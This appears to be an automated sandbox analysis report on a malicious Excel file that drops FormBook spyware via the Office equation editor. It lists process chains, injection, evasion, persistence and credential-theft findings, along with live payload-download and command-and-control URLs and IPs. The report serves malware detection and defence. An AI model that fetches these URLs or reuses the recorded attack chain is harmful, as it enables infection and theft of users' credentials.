Source: 00000007.00000002.2211993534.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2211993534.0000000010410000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: ieinstal.exe, 00000007.00000002.2209174425.0000000001FA0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@11/8@4/4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00092730 CoInitialize,CoCreateInstance,OleUninitialize, 9_2_00092730
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PAYMENT.260121.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD596.tmp Jump to behavior
Source: C:\Users\Public\name.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\name.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\name.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\name.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\name.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: PAYMENT.260121.xlsx Virustotal: Detection: 48%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe
Source: unknown Process created: C:\Users\Public\name.exe C:\Users\Public\name.exe
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: unknown Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\name.exe C:\Users\Public\name.exe Jump to behavior
Source: C:\Users\Public\name.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe Jump to behavior
Source: C:\Users\Public\name.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe File written: C:\Users\user\AppData\Roaming\K89O2Q81\K89logri.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: PAYMENT.260121.xlsx Initial sample: OLE zip file path = xl/embeddings/oleObject1.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: ieinstal.exe, wlanext.exe
Source: Binary string: wlanext.pdb source: ieinstal.exe, 00000007.00000002.2208709008.00000000002F0000.00000040.00000001.sdmp
Source: PAYMENT.260121.xlsx Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_10419A84 push ds; iretd 7_2_10419A87
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_104264D3 push eax; ret 7_2_104264DD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_1042CEB5 push eax; ret 7_2_1042CF08
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_1042CF6C push eax; ret 7_2_1042CF72
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_1042CF02 push eax; ret 7_2_1042CF08
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_1042CF0B push eax; ret 7_2_1042CF72
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_104267D3 push edx; retf 7_2_104267D4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_1042CF99 push eax; ret 7_2_1042CF72
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_1042CF99 push eax; ret 7_2_1042CF72
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0268DFA1 push ecx; ret 7_2_0268DFB4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_00290919 push ds; ret 7_2_0029091A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_0028E3E6 pushad ; ret 7_2_0028E3E7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F7DFA1 push ecx; ret 9_2_01F7DFB4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0009D0B7 push ebp; iretd 9_2_0009D0C1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0009DA70 push esp; ret 9_2_0009DA73
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00089A84 push ds; iretd 9_2_00089A87
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0009CEB5 push eax; ret 9_2_0009CF08
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0009CF0B push eax; ret 9_2_0009CF72
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0009CF02 push eax; ret 9_2_0009CF08
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0009CF6C push eax; ret 9_2_0009CF72
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0009CF99 push eax; ret 9_2_0009CF72
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0009CF99 push eax; ret 9_2_0009CF72
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01DCE3E6 pushad ; ret 9_2_01DCE3E7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01DD0919 push ds; ret 9_2_01DD091A

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\name.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Dhdvyxwl[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\name.exe Jump to dropped file

Boot Survival:

barindex
Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\wlanext.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 5JMXV4Q8GVE Jump to behavior
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\name.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xEF
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\name.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: PAYMENT.260121.xlsx Stream path '\x1ole10naTivE' entropy: 7.9961134848 (max. 8.0)

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 00000000104198E4 second address: 00000000104198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 0000000010419B5E second address: 0000000010419B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_10419A90 rdtsc 7_2_10419A90
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2348 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 852 Thread sleep time: -40000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 2836 Thread sleep time: -35000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: explorer.exe, 00000008.00000002.2348512159.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2185778287.0000000004234000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000008.00000000.2185820177.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000008.00000000.2185752863.0000000004226000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD01dRom0
Source: explorer.exe, 00000008.00000000.2185752863.0000000004226000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD01
Source: explorer.exe, 00000008.00000000.2185778287.0000000004234000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000008.00000000.2185778287.0000000004234000.00000004.00000001.sdmp Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 00000008.00000000.2185695459.00000000041DB000.00000004.00000001.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 00000008.00000000.2180000160.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_10419A90 rdtsc 7_2_10419A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_02680078 NtResumeThread,LdrInitializeThunk, 7_2_02680078
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 7_2_026926F8 mov eax, dword ptr fs:[00000030h] 7_2_026926F8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_01F826F8 mov eax, dword ptr fs:[00000030h] 9_2_01F826F8
Enables debug privileges
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 45.64.104.167 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\Public\name.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10410000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\name.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 90000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\name.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: A0000 protect: page execute and read and write Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Users\Public\name.exe Thread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: A0000 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\name.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10410000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 3D0000 Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section unmapped: C:\Program Files (x86)\Mozilla Firefox\firefox.exe base address: 1210000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\Public\name.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10410000 Jump to behavior
Source: C:\Users\Public\name.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 90000 Jump to behavior
Source: C:\Users\Public\name.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: A0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\name.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\name.exe C:\Users\Public\name.exe Jump to behavior
Source: C:\Users\Public\name.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe Jump to behavior
Source: explorer.exe, 00000008.00000002.2348807004.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000002.2348807004.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.2348512159.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000008.00000002.2348807004.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.2348540076.0000000000370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2208647364.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2208738131.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2348255135.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2246966477.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2348494474.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2211993534.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\wlanext.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Windows\SysWOW64\wlanext.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.2348540076.0000000000370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2208647364.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2208738131.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2348255135.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2246966477.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2348494474.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2211993534.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 344564 Sample: PAYMENT.260121.xlsx Startdate: 26/01/2021 Architecture: WINDOWS Score: 100 68 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->68 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 16 other signatures 2->74 11 EQNEDT32.EXE 11 2->11         started        16 EXCEL.EXE 57 12 2->16         started        process3 dnsIp4 52 91.235.129.146, 49167, 80 ITLDC-NLUA Ukraine 11->52 40 C:\Users\user\AppData\...\Dhdvyxwl[1].exe, PE32 11->40 dropped 42 C:\Users\Public\name.exe, PE32 11->42 dropped 94 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->94 18 cmd.exe 11->18         started        44 C:\Users\user\Desktop\~$PAYMENT.260121.xlsx, data 16->44 dropped file5 signatures6 process7 process8 20 name.exe 1 18->20         started        dnsIp9 50 cdn.discordapp.com 162.159.133.233, 443, 49168 CLOUDFLARENETUS United States 20->50 76 Machine Learning detection for dropped file 20->76 78 Writes to foreign memory regions 20->78 80 Allocates memory in foreign processes 20->80 82 2 other signatures 20->82 24 ieinstal.exe 20->24         started        signatures10 process11 signatures12 84 Modifies the context of a thread in another process (thread injection) 24->84 86 Maps a DLL or memory area into another process 24->86 88 Sample uses process hollowing technique 24->88 90 Queues an APC in another process (thread injection) 24->90 27 explorer.exe 24->27 injected process13 dnsIp14 54 clearkhelo.com 45.64.104.167, 49169, 49170, 80 NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN India 27->54 56 worldwide-mt.com 34.102.136.180, 49171, 49172, 80 GOOGLEUS United States 27->56 58 2 other IPs or domains 27->58 92 System process connects to network (likely due to code injection or exploit) 27->92 31 wlanext.exe 1 14 27->31         started        signatures15 process16 file17 46 C:\Users\user\AppData\...\K89logrv.ini, data 31->46 dropped 48 C:\Users\user\AppData\...\K89logri.ini, data 31->48 dropped 60 Detected FormBook malware 31->60 62 Creates an undocumented autostart registry key 31->62 64 Tries to steal Mail credentials (via file access) 31->64 66 5 other signatures 31->66 35 firefox.exe 1 31->35         started        signatures18 process19 file20 38 C:\Users\user\AppData\...\K89logrf.ini, data 35->38 dropped
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.64.104.167
unknown India
132335 NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN true
91.235.129.146
unknown Ukraine
21100 ITLDC-NLUA true
34.102.136.180
unknown United States
15169 GOOGLEUS true
162.159.133.233
unknown United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
worldwide-mt.com 34.102.136.180 true
clearkhelo.com 45.64.104.167 true
cdn.discordapp.com 162.159.133.233 true
www.clearkhelo.com unknown unknown
www.worldwide-mt.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.worldwide-mt.com/kzd/?LPF4=wZMolADuYDGcdgh+LUa/jyP2+YrvU0bz/FVPopzBFpO6gq8lUBKfHyBxkGzB3veyz2otnQ==&GtxX7=dr20ipJ0iR&sql=1 true
  • Avira URL Cloud: safe
unknown
http://www.worldwide-mt.com/kzd/ true
  • Avira URL Cloud: safe
unknown
http://91.235.129.146/Dhdvyxwl.exe true
  • Avira URL Cloud: safe
unknown